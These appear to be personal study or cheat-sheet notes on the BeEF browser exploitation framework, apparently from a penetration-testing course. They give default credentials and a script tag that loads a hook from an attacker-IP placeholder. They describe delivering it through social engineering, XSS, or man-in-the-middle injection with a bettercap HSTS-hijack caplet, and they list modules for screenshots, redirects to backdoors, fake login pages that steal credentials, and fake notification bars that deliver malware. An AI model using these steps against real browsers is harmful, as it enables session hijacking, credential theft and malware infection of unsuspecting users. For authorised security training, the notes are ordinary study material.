BeEF: Browser Exploitation Framework
Makes use of JS to hook the target browser. Works on any platform as long as target device browser supported JS

Username: beef
Password: password

Hook URL

<script src="http://<attacker-ip-address>:3000/hook.js"></script>

The URL can be sent to the target using various methods like Social Engineering, MITM attack with DNS spoofing, XSS or JS Injection after performing MITM attack

Tabs Explained

Detail Tab : Browser Details
Logs : Events that occurred in the browser
Commands : Run various commands
Proxy : Allows to use hooked browser as a proxy
XssRays : Shows if page has any XSS vulnerabilities
Network : Overview of current network

Load Hook Script on all Sites (MITM + JS Injection)

Inject Beef Code :
Add the JS Script in the HSTS Hijack caplet file and perform MITM attack

bettercap -iface <interface> -caplet <sniff-data-cap-file>
hstshijack/hstshijack (Run HSTS Caplet)


Create Alert Dialog
Create an dialog box on the target browser

Raw JavaScript
Execute JS code on the target browser

Spyder Eye
Take screenshot of the target browser screen

Redirect Browser
Redirect the target to an different webpage
Can be used to redirect to download an backdoor, fake login page, etc.

Get Visited URL
Check of a URL was visited by the target

Pretty Theft
Create fake login page to steal credentials

Fake Notification Bar
Send Backdoor, malicious code to user using an fake notification message
If sending an backdoor ensure to start “Multi Handler” to listen to the connection